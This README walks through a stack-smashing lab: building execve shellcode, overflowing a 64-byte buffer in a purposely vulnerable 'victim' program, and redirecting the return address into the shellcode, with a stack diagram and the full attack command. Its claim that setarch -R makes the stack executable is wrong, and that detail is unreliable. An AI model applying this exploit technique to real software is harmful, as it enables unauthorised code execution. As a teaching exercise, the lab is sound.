This is based on <https://crypto.stanford.edu/~blynn/rop/>. This
Makefile automates the construction of the attack code. It has been
tested on Debian 10.8 running 4.19.0-13-amd64 and using gcc (Debian
8.3.0-6) 8.3.0.

1. Compile and test the shellcode:

   make shellcode

   This creates an executable 'shellcode'. When you run the
   executable, you should end in a shell.

2. Find the start and length of the shellcode

   make shellcode.hex

   The makefile looks for the start marker (needle0) and the end
   marker (needle1), calculates the length of the code and rounds it
   up to the next power of 2. It then runs the xxd tool to extract
   the shell code out of the shellcode executable.

3. Compile and run the victim code

   make victim
   setarch $(arch) -R ./victim

   You can plan with the victim on the command line. There is nothing
   special to it. Well, the setarch command does something special, it
   makes the stack executable (by default, the stack is not executable
   and attempts to process machine code located on the stack will lead
   to a segmentation fault).

4. Grab the address where the buffer is located on the stack and
   update the Makefile if necessary   

5. Create the attack input

   make attack.bin

                      :    . . . .     :
                      +----------------+
   0x00007fffffffe318 | return address |   d0e2 ffff ff7f 0000  ---+
   0x00007fffffffe310 | saved rbp      |   0000 0000 0000 0000	   |
                      |----------------|<- rbp (frame pointer)     |
   0x00007fffffffe308 |                |   0000 0000 0000 0000	   |
   0x00007fffffffe300 |                |   0000 0000 0000 0000	   |
   0x00007fffffffe2f8 |                |   0000 0000 0000 0000	   |
   0x00007fffffffe2f0 |                |   0000 0000 0000 0000	   |
   0x00007fffffffe2e8 | char name[64]  |   6e2f 7368 00ef bead	   |
   0x00007fffffffe2e0 |                |   e8ed ffff ff2f 6269	   |
   0x00007fffffffe2d8 |                |   4831 f648 31d2 0f05	   |
   0x00007fffffffe2d0 |                |   eb0e 5f48 31c0 b03b  <--+
                      '----------------'<- rsp (stack pointer)

   The shellcode takes up the first 32 bytes of the buffer. The 80
   zeroes in the printf represent 40 zero bytes, 32 of which fill the
   rest of the buffer, and the remaining 8 overwrite the saved
   location of the RBP register. The next 8 overwrite the return
   address, and point to the beginning of the buffer where our
   shellcode lies.

6. Run the attack

   make attack

   ( ( cat shellcode.hex ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) \
     | setarch $(arch) -R ./victim